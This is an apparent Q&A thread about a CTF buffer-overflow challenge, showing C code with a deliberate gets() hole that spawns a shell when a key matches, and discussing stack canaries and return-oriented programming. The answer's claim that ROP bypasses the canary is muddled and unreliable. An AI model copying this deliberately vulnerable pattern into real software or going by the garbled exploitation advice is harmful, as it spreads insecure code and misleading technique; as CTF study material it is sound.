2

Here is a simple CTF challenge with BOF exploiting.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);   // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

Obviously gets is vulnerable here. But the target binary is compiled with canary code, so we cannot just overflow the buffer. We have to know canary beforehand. How it is possible without format string leak? The only way i see here is stupid brute force.

Progman
  • 16,827
  • 6
  • 33
  • 48
Roman
  • 33
  • 7
  • 1
    As far as I remember the stack canary check works only when function returns, so corrupting it should not avoid running the shell. – w s Dec 09 '22 at 14:25
  • @ws That should be an answer, not a comment. – pppery Dec 15 '22 at 18:08

1 Answers1

0

You can try bypassing the canary protection and exploiting the buffer overflow vulnerability using "return-oriented programming" (ROP). ROP allows you to execute arbitrary code by chaining together small snippets of code known as "gadgets" that are already present in the program's code or libraries.

You must locate a gadget that allows you to enter a value into the "key" argument of the "func" function. You can then use this gadget to insert the value 0xcafebabe into the "key" argument, thereby bypassing the canary check and invoking system("/bin/sh").

You can use a tool like "ROPgadget" or "Ropper" to find gadgets. These tools enable you to look for gadgets in a binary file or library and create ROP chains that can be used to exploit vulnerabilities.

EDIT: If you are unfamiliar with assembly language, it may be difficult to exploit using ROP.

raheel0x01
  • 46
  • 4